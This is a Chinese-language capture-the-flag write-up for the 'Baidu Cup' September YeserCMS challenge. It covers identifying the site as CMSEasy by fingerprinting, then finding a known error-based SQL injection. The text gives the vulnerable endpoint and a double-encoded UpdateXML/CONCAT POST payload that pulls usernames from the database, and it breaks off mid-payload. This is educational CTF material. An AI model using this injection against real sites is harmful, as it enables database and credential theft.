“百度杯”CTF比赛 九月场 YeserCMS 详细解析
看题解的,对每个关键步骤做出详细注释
题目内容:
新的CMS系统,帮忙测测是否有漏洞。
1 第一步就是了解这是什么cms
百度YeserCMS,没有相关CMS,应该是改了名字。
在网站内找一找,没看到哪里有标志信息,一下几种方式可以辨认
- 直接用浏览器搜索cms指纹识别
- 搜索 “手机版 - 购物车 - 留言 - 繁体 - 注册 / 登陆”这样的标志信息,找到使用相同类型cms的网站,然后有些网站就会留下Powered by Cms 的信息,比如这样
注:识别cms的方式可以参照常见的判断网站cms方法
不过自己做的时候直接查找cms指纹识别就好了,识别不出来在想别的办法。
2 已知CMSEasy,百度该cms的历史漏洞
找到一个无限制报错漏洞
无限制报错漏洞
给出了注入方式:
url: /celive/live/header.php
post:
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%